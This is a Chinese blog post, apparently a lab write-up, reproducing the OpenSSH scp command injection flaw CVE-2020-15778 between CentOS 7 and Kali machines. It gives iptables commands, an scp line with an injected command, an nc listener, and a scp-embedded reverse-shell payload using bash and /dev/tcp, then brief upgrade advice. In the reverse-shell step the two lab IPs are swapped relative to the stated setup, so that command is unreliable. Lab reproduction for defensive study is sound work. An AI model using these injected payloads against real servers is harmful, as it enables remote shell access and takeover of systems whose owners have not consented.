CVE-2020-15778漏洞复现-kali2020.4&centos7

本文档详细介绍了CVE-2020-15778,这是一个针对OpenSSH 8.3p1及更早版本的高危操作系统命令注入漏洞。通过scp命令,攻击者可以执行非法操作系统命令。复现过程包括在Centos7和Kali环境中设置iptables策略,限制SSH登录,仅允许SCP,并利用漏洞进行反弹shell,最终在Kali上执行远程命令。修复建议包括检查SSH版本并及时升级到不受影响的版本。

漏洞名称:openSSH 操作系统命令注入漏洞

等级危害:高危

CVSS评分:7.8

漏洞类型:操作系统命令注入

漏洞概述

OpenSSHOpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。

OpenSSH 8.3p1及之前版本中的scpscp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

受影响版本

openSSH <= 8.3p1

环境概述

  1. Centos7(192.168.110.135)
  2. Kali(192.168.110.134)

漏洞复现

1.查看centos中ssh版本

ssh -V

 2.准备工作

2.1安装iptables、iptables-services

yum install -y iptables

yum install iptables-services

2.2设置策略,禁止ssh登陆,保留scp

iptables -F //清空默认规则service iptables start //启动iptables服务iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP //配置iptablesservice iptables save //保存iptables配置iptables -L -n --line-number //显示iptables的规则和相对应的编号

 2.3在kali机测试ssh与scp在已设置iptables策略下的使用情况

说明scp功能正常使用,ssh连接centos失败,证明iptables策略(禁用ssh登录,只保留scp)成功有效。

3.复现

3.1首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。

scp 1.txt root@192.168.110.135:'`touch /tmp/test.txt` /tmp'

 成功将kali上面的文件传入道centOS上面。

3.2在kali机上监听5555端口

nc -lvp 5555

3.3进行反弹shell

scp test.txt root@192.168.110.134:'`bash -i >& /dev/tcp/192.168.110.135/5555 0>&1`/tmp/test1.txt'

 监听成功,连接上centos机

3.4在kali机的监听界面执行任意系统命令,比如使用ifconfig可以查到centos机的ip。

 修复建议

(1)检测方法输入ssh -v命令查看openssh版本如显示的版本号<= 8.3p1,则漏洞存在。

(2)修复方案升级补丁。

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值